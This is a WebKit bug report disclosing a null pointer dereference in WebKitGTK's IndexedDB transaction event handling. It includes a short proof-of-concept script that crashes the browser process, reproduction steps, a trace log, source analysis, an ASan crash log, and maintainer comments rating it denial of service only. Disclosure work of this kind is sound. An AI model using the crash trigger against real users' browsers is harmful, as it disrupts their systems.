NEW226820
WebKit WebCore::IDBTransaction::dispatchEvent null pointer dereference 
https://bugs.webkit.org/show_bug.cgi?id=226820
Summary WebKit WebCore::IDBTransaction::dispatchEvent null pointer dereference
STAR Labs
Reported 2021-06-09 08:10:30 PDT
Created attachment 430967 [details] POC with Docker for easier replication # Apple WebKit WebCore::IDBTransaction::dispatchEvent null pointer dereference ### Affected Software webkitGTK 2.32.0 - build in linux-18.04. ### The severity of the bug Low ### Reproduce - Steps ``` - clean local indexeddb: root# rm -rf /root/.local/share/webkitgtk* - open poc.html in Minibrowser version 2.32.0 - linux ``` - Or you may want to use my docker script to build. ``` # ./build.sh # export DISPLAY=:1000 # Xvfb :1000 -screen 0 1920x1080x24 & # rm -rf /root/.local/share/webkitgtk* && DISPLAY=:1000 LD_LIBRARY_PATH=/root/webkitASAN/lib /root/webkitASAN/bin/MiniBrowser ~/poc.html ``` ### Description of the vulnerability the poc.html ``` <script> request = window.indexedDB.open("AA", 1); request.onupgradeneeded = () => { select_event = new Event('select'); // create select event request.transaction.dispatchEvent(select_event); // dispatch this select event (1) }; </script> ``` ##### Enable IndexedDB debug Log: To print out the tracing log of the indexeddb part, we need to export an environment variable WebkitDebug by command: ``` root# export WebkitDebug=IndexedDB=debug root# rm -rf /root/.local/share/webkitgtk* && DISPLAY=:1000 LD_LIBRARY_PATH=/root/webkitASAN/lib /root/webkitASAN/bin/MiniBrowser ~/poc.html ``` The tracing log: ``` IDBFactory::open IDBConnectionToServer::openDatabase - AA@file://:file:// (<8, 3>) (1) IDBServer::openDatabase UniqueIDBDatabase::UniqueIDBDatabase() (0x7f5fc8e91000) AA@file://:file:// UniqueIDBDatabase::openDatabaseConnection UniqueIDBDatabase::handleDatabaseOperations - There are 1 pending UniqueIDBDatabase::handleCurrentOperation UniqueIDBDatabase::performCurrentOpenOperation (0x7f5fc8e91000) SQLiteIDBBackingStore::getOrEstablishDatabaseInfo - database AA UniqueIDBDatabase::startVersionChangeTransaction UniqueIDBDatabaseConnection::createVersionChangeTransaction - <8, 3> - 1 SQLiteIDBBackingStore::beginTransaction - <8, 2> UniqueIDBDatabase::handleDatabaseOperations - There are 0 pending after this round of handling IDBConnectionToServer::didOpenDatabase IDBOpenDBRequest::requestCompleted IDBDatabase::IDBDatabase - Creating database AA with version 1 connection 1 (0x7f24a980a680) IDBDatabase::startVersionChangeTransaction <8, 2> IDBTransaction::IDBTransaction - Transaction: <8, 2> mode versionchange newVersion 1 IDBOpenDBRequest::onUpgradeNeeded() - current version is 0, new is 1 IDBRequest::dispatchEvent - upgradeneeded (0x7f24a980a430) // <--- (2) IDBTransaction::dispatchEvent // <--- (3) select event IDBTransaction::handleOperationsCompletedOnServer IDBTransaction::commit IDBDatabase::willCommitTransaction <8, 2> IDBTransaction::commitOnServer IDBConnectionToServer::commitTransaction IDBServer::commitTransaction UniqueIDBDatabaseTransaction::commit UniqueIDBDatabase::commitTransaction - <8, 2> SQLiteIDBBackingStore::commitTransaction - <8, 2> SQLiteIDBTransaction::commit UniqueIDBDatabaseTransaction::commit (callback) UniqueIDBDatabaseConnection::didCommitTransaction - <8, 3> - 1 UniqueIDBDatabase::handleDatabaseOperations - There are 0 pending UniqueIDBDatabase::handleDatabaseOperations - There are 0 pending after this round of handling UniqueIDBDatabase::handleTransactions - There are 0 pending UniqueIDBDatabase::handleTransactions - There are 0 pending after this round of handling IDBConnectionToServer::didCommitTransaction IDBTransaction::didCommit IDBDatabase::didCommitTransaction <8, 2> IDBDatabase::didCommitOrAbortTransaction <8, 2> IDBTransaction::fireOnComplete IDBTransaction::dispatchEvent // <--- (4) complete event ``` Following the log, the Minibrowser called into function IDBTransaction::dispatchEvent 2 times (3), (4), notice that it crashed at the second call(4). Let see the source code of this function. http://122.11.210.191/webkit_gtk/webkit_gtk/webkit_gtk/Source/WebCore/Modules/indexeddb/IDBTransaction.cpp.html#_ZN7WebCore14IDBTransaction13dispatchEventERNS_5EventE ```cpp // WebkitGTK2.32.0/Source/WebCore/Modules/indexeddb/IDBTransaction.cpp:592 void IDBTransaction::dispatchEvent(Event& event) { LOG(IndexedDB, "IDBTransaction::dispatchEvent"); ASSERT(canCurrentThreadAccessThreadLocalData(m_database->originThread())); ASSERT(scriptExecutionContext()); ASSERT(!isContextStopped()); ASSERT(event.type() == eventNames().completeEvent || event.type() == eventNames().abortEvent); auto protectedThis = makeRef(*this); EventDispatcher::dispatchEvent({ this, m_database.ptr() }, event); m_didDispatchAbortOrCommit = true; if (isVersionChange()) { ASSERT(m_openDBRequest); m_openDBRequest->versionChangeTransactionDidFinish(); if (event.type() == eventNames().completeEvent) { if (m_database->isClosingOrClosed()) m_openDBRequest->fireErrorAfterVersionChangeCompletion(); else m_openDBRequest->fireSuccessAfterVersionChangeCommit(); } m_openDBRequest = nullptr; // <--- (5) } } ``` 1. In poc.html, we set up a callback for event |IDBRequest::onupgradeneeded|. When the callback is called, the function |IDBTransaction::dispatchEvent| also will be called after to dispatch our select event (1). 2. At the first time when indexedDB is created, it will dispatch an event |IDBRequest::onupgradeneeded|(2) to update DB from version 0 -> version 1. Then it calls into our callback and |IDBTransaction::dispatchEvent|(3) to dispatch our select event. At the first time it calls into |IDBTransaction::dispatchEvent| for changing version, |m_openDBRequest| has value = nullptr (5). 3. Later, a callback calls into |IDBTransaction::dispatchEvent|(4) again to dispatch complete event, but this time |m_openDBRequest| is a null pointer, this lead to null pointer dereference bug. #### Asan Log ``` root@f4d851ca4fc4:~# DISPLAY=:1337 ASAN_OPTIONS=allocator_may_return_null=1,detect_leaks=0,exitcode=42 LD_LIBRARY_PATH=/root/webkitASAN/lib ASAN_SYMBOLIZER_PATH=/root/clang/bin/llvm-symbolizer /root/webkitASAN/bin/MiniBrowser indexeddb.html WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory and useSharedArrayBuffer will be disabled. WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory and useSharedArrayBuffer will be disabled. WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory and useSharedArrayBuffer will be disabled. AddressSanitizer:DEADLYSIGNAL ================================================================= ==728==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000090 (pc 0x7f2c6b776609 bp 0x7ffec44de450 sp 0x7ffec44de2f0 T0) ==728==The signal is caused by a WRITE memory access. ==728==Hint: address points to the zero page. #0 0x7f2c6b776609 in WebCore::IDBOpenDBRequest::versionChangeTransactionDidFinish() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/Modules/indexeddb/IDBOpenDBRequest.cpp:86:36 #1 0x7f2c6b7abc63 in WebCore::IDBTransaction::dispatchEvent(WebCore::Event&) /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/Modules/indexeddb/IDBTransaction.cpp:608:26 #2 0x7f2c6c9c682a in WebCore::EventLoop::run() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/dom/EventLoop.cpp:123:19 #3 0x7f2c6cbb2bc8 in WebCore::WindowEventLoop::didReachTimeToRun() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/dom/WindowEventLoop.cpp:120:5 #4 0x7f2c6e0e142d in WebCore::ThreadTimers::sharedTimerFiredInternal() /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/platform/ThreadTimers.cpp:127:23 #5 0x7f2c655a3fd4 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16 #6 0x7f2c655a3fd4 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43 #7 0x7f2c655a156c in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28 #8 0x7f2c655a156c in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5 #9 0x7f2c5dc7b3a4 in g_main_context_dispatch (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4c3a4) #10 0x7f2c5dc7b76f (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4c76f) #11 0x7f2c5dc7ba81 in g_main_loop_run (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4ca81) #12 0x7f2c655a2abe in WTF::RunLoop::run() /root/webkitgtk-2.32.0/mybuild/../Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9 #13 0x7f2c6a07a46d in WebKit::AuxiliaryProcessMainBase<WebKit::WebProcess, true>::run(int, char**) /root/webkitgtk-2.32.0/mybuild/../Source/WebKit/Shared/AuxiliaryProcessMain.h:70:9 #14 0x7f2c6a07a46d in int WebKit::AuxiliaryProcessMain<WebKit::WebProcessMainGtk>(int, char**) /root/webkitgtk-2.32.0/mybuild/../Source/WebKit/Shared/AuxiliaryProcessMain.h:96:27 #15 0x7f2c5c658bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x41cc19 in _start (/usr/libexec/webkit2gtk-4.0/WebKitWebProcess+0x41cc19) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/webkitgtk-2.32.0/mybuild/../Source/WebCore/Modules/indexeddb/IDBOpenDBRequest.cpp:86:36 in WebCore::IDBOpenDBRequest::versionChangeTransactionDidFinish() ==728==ABORTING ** (MiniBrowser:660): WARNING **: 06:31:33.922: WebProcess CRASHED ``` Sending on behalf of our researcher, TẠ ĐÌNH SUNG of STAR Labs
Attachments
POC with Docker for easier replication (4.13 KB, application/x-7z-compressed)
2021-06-09 08:10 PDT, STAR Labs 		no flags
Details
View All Add attachment proposed patch, testcase, etc.
Radar WebKit Bug Importer
Comment 1 2021-06-09 08:10:41 PDT
<rdar://problem/79077281>
Carlos Alberto Lopez Perez
Comment 2 2021-07-22 11:58:21 PDT
(In reply to STAR Labs from comment #0) > Created attachment 430967 [details] > POC with Docker for easier replication > > # Apple WebKit WebCore::IDBTransaction::dispatchEvent null pointer > dereference > > ### Affected Software > > webkitGTK 2.32.0 - build in linux-18.04. > Note that WebKitGTK is the GTK port of the WebKit project. Meanwhile Apple WebKit is the Mac/iOS port of the WebKit project. Both ports same a common codebase, but there are enough differences between the two such that not necessarily a security issue reported in one affects the other. I'm retitling this appropriately since the issue you report seems to have been only tested with WebKitGTK.
STAR Labs
Comment 3 2021-12-31 04:17:08 PST
Just wondering if this is fixed and if there are any CVE assigned to this? Thanks in advance.
Michael Catanzaro
Comment 4 2025-11-14 08:14:48 PST
Since a null pointer dereference will cause the process to immediately crash, there's no security impact beyond denial of service, which is not worth requesting a CVE for. I don't think this can reasonably quality as a security bug.
Note You need to log in before you can comment on or make changes to this bug.